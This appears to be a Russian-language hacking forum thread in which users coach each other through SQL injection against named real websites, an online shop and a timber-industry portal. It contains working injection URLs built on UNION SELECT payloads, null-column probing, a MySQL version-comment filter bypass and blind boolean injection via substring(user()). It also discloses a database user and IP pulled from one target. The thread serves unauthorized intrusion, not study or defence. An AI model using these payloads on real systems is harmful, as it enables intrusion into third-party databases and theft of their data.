Вообщем случайно ткнул и нашел баг, как обычно кавычкой

теперь вопрос как реализовать, я подставил одну кавыку мне ругалось типа как прально надо и показало друго продуктИД и я постоянно подставлял всё новый и новый ид с кавычкой, пока вообще не исчезла одна строка, теперь вопрос выдает это:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' union select 1,2/*' at line 1 SQL query : select photoID, filesname, thumbnail, enlarged from SS_product_pictures where productID=5656\' union select 1,2/*

может кто подскажет как бороться? я в растеренности. как видим это шоп

Значение обрамленно кавычкой, кавычки фильтруються, для того что бы создать правильный запрос тебе надо обойти фильтрацию что сделать думаю будет очень сложно если вообще возможно.

Хоть бы ссылку дал...

where productID=5656\ Какая тут ковычка кэш ? пробуй -1 union select 1/*

']Значение обрамленно кавычкой, кавычки фильтруються, для того что бы создать правильный запрос тебе надо обойти фильтрацию что сделать думаю будет очень сложно если вообще возможно.

Дык вроде не обрамлено:
productID=5656\'

тут только его кавычка...

2rubik-nerubik просто не ставь кавычку и раскручивай скулю...

после = в запросе поставь:
-5656 union select 1,2,3,4/*

как я понял, в select там 4 поля

без кавычки никак т.е. пробывал всё, ерроры выскакивают только с ней может есть алтернатива?

количество столбцов неизвестно

суди о выводу ошибки. столбцов 4. давай сюда разберемся. если там mag quotes или addslashes и в запроск обрамление в "" то прийдетсо сложно =)
давай сюда

без кавычки никак т.е. пробывал всё, ерроры выскакивают только с ней может есть алтернатива?

количество столбцов неизвестно

дык зачем тебе ерроры... сделай как я сказал и ищи на странице цифры 1,2,3 или 4 если нет этих цифр возможно это blind -inj вобщем без реального линка сложно тебе че нить сказать

ссылку в студию, вполне возможно что кэш прав, и составить новый запрос можно только закрыв предидущий кавычкой

union select 1,2/*'
гема прав посмотрел только начало ошибки. Смутила последнияя кавычка, а она еррор просто обрамляет.

Народ благо не создавать новых тем помогите со скулем
http://www.lesprom.ru/html/error.php3?e404'/*
Немогу подобрать колонки может стото не так делаю( может просто mysql версии < 4.0

вот такой запрос непрокатывает( надоело поля подбирать да и неверю что их так много)
http://www.lesprom.ru/html/error.php3?-1'%20union%20select%20null,null,null,null,null,nul l,null,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null,null,null/*
А вот тут
http://www.lesprom.ru/members/azlist.php3?sort=clist&order=fullname/*
с ордером проблема помогите хотябы поля подобрать.

http://www.lesprom.ru/html/error.php3?e404'/*
Немогу подобрать колонки может стото не так делаю( может просто mysql версии < 4.0


мускул действительно 3x в нем union select не катит
да и пробелы фильтруются

http://www.lesprom.ru/html/error.php3?e404'/*!30000asas/*


А вот тут
http://www.lesprom.ru/members/azlist.php3?sort=clist&order=fullname/*
с ордером проблема помогите хотябы поля подобрать.


тут у меня не получилось провести инъекцию, хотя ошибка выдается, мож там фильтрация какая нить...

а насчет:с ордером проблема помогите хотябы поля подобрать.

я вобще не понял о чем ты

http://www.cddj.ru/index.php?productID=-6915+union+select+1,2,3,4/*
вот сайт, я давал кешу и блекберу, они развели руками или чем там )
кстати, кеш автор множества статей по скулю =\

вобщем там mysql 4.1 user()-clubfotonet@81.177.16.192

Это все делается через подзапросы, но в другом параметре:http://www.cddj.ru/index.php?productID=1312&picture_id=1420%20and%20substring(user(),25,1)=2/*

вобщем если выражение верное, то загружаются сразу много картинок, в противном случае картинки незагружаются...
версия 4.1 используй подзапросы

http://www.cddj.ru/index.php?productID=-6915+union+select+1,2,3,4/*
вот сайт, я давал кешу и блекберу, они развели руками или чем там )
кстати, кеш автор множества статей по скулю =\

в этом параметре да =)
на полный аудит сайта я не не подписывался =)

http://www.cddj.ru/index.php?productID=-6915+union+select+1,2,3,4/*
вот сайт, я давал кешу и блекберу, они развели руками или чем там )
кстати, кеш автор множества статей по скулю =\
Когда вас корректно посылают вы не понимаете?